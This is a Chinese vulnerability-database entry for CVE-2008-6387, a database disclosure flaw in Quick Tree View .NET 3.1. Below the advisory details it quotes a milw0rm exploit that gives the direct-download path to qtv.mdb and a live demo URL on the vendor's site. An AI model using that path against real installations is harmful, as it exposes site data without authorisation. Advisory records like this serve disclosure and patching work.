Activewebsoftwares Quick Tree View .NET 'qtv.mdb'信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116882 漏洞类型 信息泄露
发布时间 2008-11-30 更新时间 2009-03-02
CVE编号 CVE-2008-6387 CNNVD-ID CNNVD-200903-041
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7303
https://www.securityfocus.com/bid/84549
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-041
|漏洞详情
QuickTreeView.NET是一个旨在建立在NET应用TreeView的Web服务器控件。QuickTreeView.NET3.1版本在网站根目录下储存敏感信息,但没有赋予足够的访问控制,这会允许远程攻击者可以借助对qtv.mdb提交一个直接的请求,获得敏感信息。
|漏洞EXP
***********************************************************************************************************************************************************        
[!]                                                                                                                                                     [!]
[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
[!]                                 O    O            O                                 O      O                                                        [!]
[!]                                 O                 O                                       O                                                         [!]
[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
[!]                                           OO                                                                                                        [!]
[!]                                          OO                                                                                                         [!]
[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
[!]                                        OO                    WwW.Exploiter5.CoM ; No-ExploiT.CoM ; WwW.IQ-TY.CoM                                    [!]
***********************************************************************************************************************************************************
+----                                                        Bismi Allah Irahmani ArraHim                                                             ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++                             [ Quick Tree View .NET v 3.1 (qtv.mdb) Remote Database Disclosure Vulnerability ]                                         ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
:   Author   : Cyber-Zone   ( Abdelkhalek )                                                               :       :                                       :
¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ¦       ¦                                       ¦
¦   Home     : WwW.IQ-Ty.CoM                                                                              ¦       ¦         MySQL Version Is :            ¦
¦   From     : Mor0ccan nightamres                                                                        ¦       ¦                                       ¦
¦   Script   : http://activewebsoftwares.com                                                              ¦       ¦                ![ ]!                  ¦
¦   Download : http://activewebsoftwares.com/P22_QuickTreeView.NET.aspx?Tabopen=                          ¦       ¦                                       ¦
¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
¦                                                          From The Dark Side Of MoroCCo                                                                 ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
:                                                                                                                                                         :
¦  Remember    :                                                                                                                                          ¦
¦  -------------                                                                                                                                          ¦
¦                                                                                                                                                         ¦
¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
¦                                                                                                                                                         ¦

++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++        [!]  Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an  [!]            ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++

http://localhost/script/data/qtv.mdb

Live demo

http://www.activewebsoftwares.com/democomponents/qtvdotnet/data/qtv.mdb

Nayda Dima Nayda
Mgharba




+--------------------------------------------------------------------------------------------------------------------------------------------------------++
+----                                                                  ThanX To                                                                       ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
=                                                                    [AttaCk Is CompLet]                                                                  =
___________________________________________________________________________________________________________________________________________________________

# milw0rm.com [2008-11-30]
|受影响的产品
Activewebsoftwares Quick Tree View .Net 3.1
|参考资料

来源:XF
名称:quicktreeview-qtv-info-disclosure(46956)
链接:http://xforce.iss.net/xforce/xfdb/46956
来源:VUPEN
名称:ADV-2008-3293
链接:http://www.vupen.com/english/advisories/2008/3293
来源:MILW0RM
名称:7303
链接:http://www.milw0rm.com/exploits/7303